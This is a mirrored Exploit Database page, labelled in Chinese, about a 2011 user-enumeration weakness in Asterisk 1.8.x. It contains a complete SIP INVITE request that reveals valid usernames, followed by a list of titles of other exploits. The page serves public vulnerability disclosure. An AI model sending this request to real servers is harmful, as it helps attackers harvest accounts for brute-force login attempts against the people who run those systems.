Asterisk 1.8.x – SIP INVITE Request User Enumeration

Exploit Database
14 阅读

作者： Francesco Tornieri

日期： 2011-05-02
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/35685/

source: https://www.securityfocus.com/bid/47676/info

Asterisk is prone to a user-enumeration weakness.

An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.

This issue affects Asterisks 1.8. 

The following request is available:

INVITE sip:192.168.2.1 SIP/2.0
CSeq: 3 INVITE
Via: SIP/2.0/UDP www.example.com:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:105@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2
To: <sip:500@192.168.2.1>
Contact: <sip:105@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 0
Max-Forwards: 70

last Exploits
Asterisk 1.8.x – SIP INVITE Request User Enumeration的更多信息

Microsoft Data Access Components – Remote Overflow (MS11-002)：
McAfee ePolicy Orchestrator / ProtectionPilot – Remote Overflow (Metasploit)：
Samsung iPOLiS – ReadConfigValue Remote Code Execution：
Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)：
Pango Font Parsing – ‘pangoft2-render.c’ Heap Corruption：
Microsoft Internet Explorer 8 – ‘toStaticHTML()’ HTML Sanitization Bypass：
Hughes Satellite Router HX200 v8.3.1.14 – Remote File Inclusion：
Gekko Manager FTP Client – Remote Stack Buffer Overflow (Metasploit)：